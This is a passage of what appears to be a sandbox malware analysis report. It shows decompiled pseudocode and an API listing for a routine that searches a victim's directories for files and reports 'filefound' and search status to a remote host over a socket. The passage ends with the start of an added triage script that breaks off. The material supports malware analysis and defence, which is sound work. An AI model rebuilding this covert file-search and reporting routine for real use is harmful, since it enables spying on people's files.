                                          				_t96 = _t228 - 0x29c;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t96, _t220, _t224, _t153);
                                          				 *__ecx =  *__ecx | 0xffffffff;
                                          				 *(_t228 - 4) = 0;
                                          				_push(6);
                                          				_push(1);
                                          				_push(0);
                                          				L0040FF26();
                                          				 *__ecx = _t96;
                                          				_push(0x10);
                                          				_push(0x415278);
                                          				_push(_t96);
                                          				L0040FF38();
                                          				if(_t96 != 0) {
                                          					L0040FC88();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0);
                                          					_push(atoi(_t96));
                                          					E00403474(_t228 + 0x28, _t219);
                                          					FindClose( *(_t228 - 0x14));
                                          					ExitThread(0);
                                          				}
                                          				_t232 = _t231 - 0x10;
                                          				_t102 = _t228 - 0x2b4;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t105 = E00402504(_t228 - 0x2d4, _t232, _t228 - 0x2d4, _t228 - 0x2d4, _t228 - 0x2c4, _t228 - 0x2c4);
                                          				_t237 = _t232 + 0x44;
                                          				asm("sbb ebx, ebx");
                                          				_t158 =  ~(_t105 + 1) + 1;
                                          				 *((char*)(_t228 - 0x2a0)) = _t158;
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t102, _t102, "searchstarted", 0x415268, _t228 + 0x28, 0x415268, _t228 + 0x38,  *__ecx);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				if(_t158 != 0) {
                                          					 *((intOrPtr*)(_t228 - 0x2d8)) = 1;
                                          					_push(0x411a80);
                                          					_t105 = _t228 - 0x2d8;
                                          					_push(_t228 - 0x2d8);
                                          					L0040FC88();
                                          				}
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				E00403646(_t105, _t105, _t105, __imp__tolower);
                                          				L0040FC3E();
                                          				_t239 = _t237 + 0x1c;
                                          				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ(_t228 + 8, "*", _t228 - 0x274);
                                          				 *(_t228 - 0x14) = FindFirstFileW(_t228 - 0x2e8, _t228 - 0x2e8);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				if( *(_t228 - 0x14) == 0xffffffff) {
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("searchwrongpath", _t228 - 0x2f0,  *_t221);
                                          					E00402504(_t228 - 0x2f0);
                                          					_t239 = _t239 - 0x10 + 0x14;
                                          					 *((intOrPtr*)(_t228 - 0x2f4)) = 2;
                                          					_push(0x411a80);
                                          					_push(_t228 - 0x2f4);
                                          					L0040FC88();
                                          				}
                                          				while(FindNextFileW( *(_t228 - 0x14), _t228 - 0x274) != 0) {
                                          					if(( *(_t228 - 0x274) & 0x00000010) != 0 && wcscmp(_t228 - 0x248, ".") != 0 && wcscmp(_t228 - 0x248, L"..") != 0) {
                                          						_t142 = _t228 - 0x248;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t142, _t228 - 0x308, "\\");
                                          						L0040FC38();
                                          						L0040FC3E();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t228 + 8, _t142);
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						_t239 = _t239 + 0x18;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						if(E00403183(_t221, _t228 - 0x294, _t228 + 0x18, _t228 - 0x294, _t228 - 0x318, _t228 - 0x318) == 0) {
                                          							 *((intOrPtr*)(_t228 - 0x324)) = 3;
                                          							_push(0x411a80);
                                          							_push(_t228 - 0x324);
                                          							L0040FC88();
                                          						}
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t228 - 0x248, _t228 - 0x328);
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					E00403646(_t228 - 0x248, _t228 - 0x248, _t228 - 0x248, __imp__tolower);
                                          					_t239 = _t239 + 0x10;
                                          					_t125 = _t228 + 0x18;
                                          					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t125, 0);
                                          					if(_t125 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						_t127 = _t228 - 0x274;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t127, 0x250, _t228 - 0x33c);
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t127);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						_t250 = _t239 - 0x10;
                                          						_t132 = _t228 - 0x364;
                                          						L0040FC1A();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						_t135 = E00402504(_t228 - 0x384, _t250, _t228 - 0x384, _t228 - 0x384, _t228 - 0x374, _t228 - 0x374);
                                          						_t239 = _t250 + 0x44;
                                          						asm("sbb ebx, ebx");
                                          						_t165 =  ~(_t135 + 1) + 1;
                                          						 *((char*)(_t228 - 0x340)) = _t165;
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t132, _t132, "filefound", 0x415268, E0040EDD3(_t228 - 0x354, _t228 + 8), 0x415268, _t228 - 0x24,  *_t221);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						if(_t165 != 0) {
                                          							 *((intOrPtr*)(_t228 - 0x388)) = 4;
                                          							_push(0x411a80);
                                          							_push(_t228 - 0x388);
                                          							L0040FC88();
                                          						}
                                          					}
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				}
                                          				 *(_t228 - 4) =  *(_t228 - 4) | 0xffffffff;
                                          				FindClose( *(_t228 - 0x14));
                                          				_t116 = _t228 - 0x39c;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t119 = E00402504(_t228 - 0x3bc, _t239 - 0x10, _t228 - 0x3bc, _t228 - 0x3bc, _t228 - 0x3ac, _t228 - 0x3ac);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t116, _t116, "searchfinished", 0x415268, _t228 + 0x28, 0x415268, _t228 + 0x38,  *_t221);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t121 = E00403474(_t228 + 0x28, _t219);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(atoi(_t119));
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
                                          				return _t121;
			}

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00402C4A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,7313CB00,7313CB00), ref: 00402C67
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 00402C7A
                                          • connect.WS2_32(00000000,00415278,00000010), ref: 00402C89
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchstarted,00415268,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CB8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CC8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CD8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CE2
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D06
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D12
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D1E
                                          • _CxxThrowException.MSVCRT(00000001,00411A80), ref: 00402D3E
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D4C
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D56
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D60
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 00402D86
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00402D90
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00402D97
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00402DA6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(searchwrongpath,?), ref: 00402DC5
                                          • _CxxThrowException.MSVCRT(00000002,00411A80), ref: 00402DE9
                                          • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00402DF8
                                          • wcscmp.MSVCRT ref: 00402E25
                                          • wcscmp.MSVCRT ref: 00402E3D
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041079C), ref: 00402E62
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00402E74
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00402E84
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E92
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E9E
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EAD
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EBF
                                            • Part of subcall function 00403183: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,75949F40), ref: 00403198
                                            • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,75949F40), ref: 004031A7
                                            • Part of subcall function 00403183: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031B1
                                            • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031BB
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                            • Part of subcall function 00403183: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                            • Part of subcall function 00403183: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                            • Part of subcall function 00403183: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                            • Part of subcall function 00403183: wcscmp.MSVCRT ref: 00403247
                                            • Part of subcall function 00403183: wcscmp.MSVCRT ref: 0040325F
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                          • _CxxThrowException.MSVCRT(00000003,00411A80), ref: 00402EE6
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00411A80), ref: 00402EF1
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00402F0B
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00402F1D
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F2A
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F37
                                          • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00402F52
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00402F7F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402F89
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F95
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00402FC7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 00402FD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 00402FE7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 00402FF1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403015
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403021
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040302D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403039
                                          • _CxxThrowException.MSVCRT(00000004,00411A80), ref: 00403059
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00411A80), ref: 00403064
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403076
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchfinished,00415268,?,00415268,?), ref: 00403099
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 004030A9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004030B9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004030C3
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                            • Part of subcall function 00402504: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 004025C8
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030E5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030F1
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030FA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403112
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040311B
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403124
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040312D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403136
                                          • atoi.MSVCRT ref: 00403101
                                            • Part of subcall function 00403474: _EH_prolog.MSVCRT ref: 00403479
                                            • Part of subcall function 00403474: closesocket.WS2_32(?), ref: 004034BB
                                            • Part of subcall function 00403474: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000000,7313CB00,7313CB00,?,?,0040C61E,00000000), ref: 004034CD
                                          • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0040314F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00415278,00000010,00000000,00000001,00000006), ref: 00403157
                                          • atoi.MSVCRT ref: 0040315E
                                          • FindClose.KERNEL32(?), ref: 0040316F
                                          • ExitThread.KERNEL32 ref: 00403177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$D@2@@0@$??0?$basic_string@V10@0@$?begin@?$basic_string@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@V10@@$??4?$basic_string@?data@?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$?empty@?$basic_string@?find@?$basic_string@A?$basic_string@ExitTerminateV12@closesocketconnectsocket
                                          • String ID: filefound$searchfinished$searchstarted$searchwrongpath
                                          • API String ID: 525724632-2241827744
                                          • Opcode ID: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                                          • Instruction ID: 37d5ccb0cac30d8a9bba9e41291a70e7b7d0e58fcafd169c2c2f7e39e65e0a14
                                          • Opcode Fuzzy Hash: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                                          • Instruction Fuzzy Hash: 97D11F72900119ABDB15EB60DD8EADE777CAF14305F0041BAF50AA2091EF795F89CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%
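
The listing above is typical of this report: a few Win32 and CRT calls (FindFirstFileW, FindNextFileW, wcscmp, send, FindClose, atoi, ExitThread) buried in dozens of MSVCP60 std::basic_string operator calls, with the C2 status tokens (filefound, searchfinished, searchstarted, searchwrongpath) only visible in the String ID line and as resolved arguments. The following script is an added triage helper, not part of the report or of Joe Sandbox. It parses lines in the "• <api>.<MODULE>(<args>), ref: <addr>" shape shown above, drops the MSVCP60 string plumbing, and pulls out the resolved string arguments and the String ID tokens so the behaviour of a function can be read at a glance. The sample lines are copied from the listing above; classifying any 8-hex-digit argument as an immediate is an assumption of the helper.

```python
"""Triage helper for Joe Sandbox "APIs" function listings.

Added example (not part of the report or of Joe Sandbox). Parses the
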